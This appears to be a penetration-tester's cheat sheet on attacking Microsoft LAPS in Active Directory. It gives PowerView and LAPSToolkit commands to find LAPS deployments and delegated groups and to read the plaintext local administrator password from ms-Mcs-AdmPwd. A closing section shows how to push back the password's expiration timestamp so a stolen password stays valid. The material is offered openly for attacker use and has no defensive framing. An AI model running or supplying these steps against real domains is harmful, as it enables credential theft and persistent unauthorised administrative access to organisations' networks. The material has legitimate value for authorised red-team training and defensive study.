In Active Directory, LAPS randomizes the password of local administrator accounts periodically. Under LAPS, computer objects are assigned ms-Mcs-AdmPwd
and ms-Mcs-AdmPwdExpirationTime
, and only domain admins can read or write these attributes, but exceptions can be made through changing DACL. When the expiration time is reached, the password will change upon a gpupdate command.
Enumeration
- Look for
C:\Program Files\LAPS\CSE\AdmPwd.dll
- Look for relevant GPOs:
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
- Look for the expiration time attribute (world-readable):
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
- After locating the GPO, download the LAPS policy file:
ls \\[domain-fqdn]\SysVol\[domain-fqdn]\Policies\{[gpo-guid]}\Machine
. Use GPRegistryPolicyParser to view a policy file. - LAPSToolkit:
Find-LAPSDelegatedGroups
- With enough rights, we can obtain the plaintext password:
Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd
Prevent obtained password from expiring
If you were able to obtain the LAPS password and want to keep using it, consider changing the password expiration date. All computer accounts have write access to its own expiration field.
- View the current expiration timestamp
- Convert LDAP timestamp to human-readable
- Set timestamp:
Set-DomainObject -Identity [computer-name] -Set @{'ms-Mcs-AdmPwdExpirationTime' = '[new-timestamp]'} -Verbose
- note the computer name does not have
$
- note the computer name does not have